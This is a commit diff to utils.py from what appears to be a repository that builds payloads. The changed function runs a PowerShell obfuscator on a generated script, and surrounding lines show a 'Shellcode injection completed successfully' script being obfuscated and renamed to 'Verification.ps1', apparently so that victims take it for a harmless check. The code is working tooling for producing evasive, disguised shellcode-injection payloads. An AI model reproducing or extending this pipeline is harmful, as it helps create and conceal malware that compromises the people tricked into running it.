sigyllly commited on
Commit
0f32dbb
·
verified ·
1 Parent(s): 05d7231

Update utils.py

Browse files
Files changed (1) hide show
  1. utils.py +9 -5
utils.py CHANGED
@@ -40,14 +40,14 @@ def generate_random_string(length=8):
40
 
41
  def obfuscate_powershell_script(ps1_path):
42
  try:
43
- cmd = f'pwsh -f "{OBFUSCATOR_SCRIPT}"'
44
- process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True)
45
- process.stdin.write(f"{ps1_path}\n")
46
- process.stdin.flush()
47
  stdout, stderr = process.communicate()
48
  if process.returncode != 0:
49
  raise Exception(f"Error obfuscating PowerShell script: {stderr}")
50
- obfuscated_file = ps1_path.replace(".ps1", "_OBF.ps1")
 
51
  return obfuscated_file
52
  except Exception as e:
53
  raise Exception(f"Obfuscation failed: {str(e)}")
@@ -342,6 +342,10 @@ Write-Host "Shellcode injection completed successfully."
342
  # Obfuscate the PowerShell script
343
  obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)
344
 
 
 
 
 
345
  # Rename the obfuscated file to Verification.ps1
346
  verification_ps1_path = os.path.join(temp_dir, "Verification.ps1")
347
  os.rename(obfuscated_ps1_path, verification_ps1_path)
 
40
 
41
  def obfuscate_powershell_script(ps1_path):
42
  try:
43
+ obfuscated_file = ps1_path.replace(".ps1", "_OBF.ps1")
44
+ cmd = f'pwsh -f "{OBFUSCATOR_SCRIPT}" "{ps1_path}" "{obfuscated_file}"'
45
+ process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True)
 
46
  stdout, stderr = process.communicate()
47
  if process.returncode != 0:
48
  raise Exception(f"Error obfuscating PowerShell script: {stderr}")
49
+ if not os.path.exists(obfuscated_file):
50
+ raise FileNotFoundError(f"Obfuscated file not found: {obfuscated_file}")
51
  return obfuscated_file
52
  except Exception as e:
53
  raise Exception(f"Obfuscation failed: {str(e)}")
 
342
  # Obfuscate the PowerShell script
343
  obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)
344
 
345
+ # Verify that the obfuscated file exists before renaming
346
+ if not os.path.exists(obfuscated_ps1_path):
347
+ raise FileNotFoundError(f"Obfuscated file not found: {obfuscated_ps1_path}")
348
+
349
  # Rename the obfuscated file to Verification.ps1
350
  verification_ps1_path = os.path.join(temp_dir, "Verification.ps1")
351
  os.rename(obfuscated_ps1_path, verification_ps1_path)